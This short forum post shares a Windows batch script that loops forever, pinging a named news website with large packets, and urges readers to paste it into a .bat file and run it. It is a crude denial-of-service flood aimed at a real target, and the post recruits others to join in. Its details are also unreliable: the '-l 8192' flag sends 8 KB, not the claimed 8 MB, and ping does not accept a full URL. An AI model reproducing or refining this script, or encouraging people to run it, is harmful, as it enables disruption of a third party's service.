GUYS, this is a batch file for windows, it pings him with 8mb of data 10000 times before looping and doing it all over again 
:loop
ping http://www.vanguardnewsnetwork.com -l 8192 -n 10000
goto loop
Copypasta that into a .bat file
Save Gas, Drive A Diesel...
